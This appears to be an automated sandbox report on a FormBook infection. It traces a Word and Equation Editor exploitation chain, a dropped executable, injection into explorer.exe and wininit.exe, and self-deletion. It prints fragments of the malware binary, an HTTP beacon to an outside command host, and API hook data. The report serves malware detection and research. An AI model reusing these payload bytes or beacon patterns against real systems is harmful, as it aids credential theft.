07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 2a 00 00 0a 6f 27 00 00 0a 58 20 29 55 55 a5 5a 28 2c 00 00 0a 02 7b 2b 00 00 0a 6f 2e 00 00 0a 58 2a 00 00 00 13 30 07 00 88 00 00 00 04 00 00 11 14 72 25 00 00 70 18 8d 17 00 00 01 25 16 02 7b 2a 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 25 17 02 7b 2b 00 00 0a 0c 12 02 12 03 fe 15 06 00 00 1b 09 8c 06 00 00 1b 2d 14 71 06 00 00 1b 0d 12 03 09 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0f @ @OT` H.textl `.rsrcT@@.reloc`,@BHHS{#*:($}#*0$u,(%{#{#o&+*v l )UUZ(%{#o'X*0Mrp%{#-q-&+o(()*{**{+*V($}*}+*0<u,0(%{*{*o&,(,{+{+o-+* pi| )UUZ(%{*o'X )UUZ(,{+o.X*0r%p%{*-q-&+o(%{+-q-&+


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.224916634.98.99.3080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Sep 27, 2021 14:27:22.379725933 CEST917OUTGET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1
                                                          Host: www.lazyguysmarketing.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Sep 27, 2021 14:27:22.497193098 CEST917INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 27 Sep 2021 12:27:22 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "6139ed55-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          PeekMessageAINLINEexplorer.exe
                                                          PeekMessageWINLINEexplorer.exe
                                                          GetMessageWINLINEexplorer.exe
                                                          GetMessageAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: USER32.dll
                                                          Function NameHook TypeNew Data
                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE8
                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE8
                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE8
                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE8

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: WINWORD.EXE PID: 2008 Parent PID: 596

                                                          General

                                                          Start time:14:25:14
                                                          Start date:27/09/2021
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                          Imagebase:0x13f030000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Analysis Process: EQNEDT32.EXE PID: 1812 Parent PID: 596

                                                          General

                                                          Start time:14:25:15
                                                          Start date:27/09/2021
                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                          Imagebase:0x400000
                                                          File size:543304 bytes
                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: ibefrankhq4862.exe PID: 2032 Parent PID: 1812

                                                          General

                                                          Start time:14:25:17
                                                          Start date:27/09/2021
                                                          Path:C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
                                                          Imagebase:0x13a0000
                                                          File size:863744 bytes
                                                          MD5 hash:7572FBC5DE30359E833D6F382DB286FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Antivirus matches:
                                                          • Detection: 13%, ReversingLabs
                                                          Reputation:low

                                                          Analysis Process: ibefrankhq4862.exe PID: 1320 Parent PID: 2032

                                                          General

                                                          Start time:14:25:20
                                                          Start date:27/09/2021
                                                          Path:C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
                                                          Imagebase:0x13a0000
                                                          File size:863744 bytes
                                                          MD5 hash:7572FBC5DE30359E833D6F382DB286FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          Analysis Process: explorer.exe PID: 1764 Parent PID: 1320

                                                          General

                                                          Start time:14:25:21
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0xffa10000
                                                          File size:3229696 bytes
                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          Analysis Process: wininit.exe PID: 2636 Parent PID: 1764

                                                          General

                                                          Start time:14:25:35
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\wininit.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\wininit.exe
                                                          Imagebase:0x5b0000
                                                          File size:96256 bytes
                                                          MD5 hash:B5C5DCAD3899512020D135600129D665
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          Analysis Process: cmd.exe PID: 2036 Parent PID: 2636

                                                          General

                                                          Start time:14:25:39
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
                                                          Imagebase:0x4a810000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >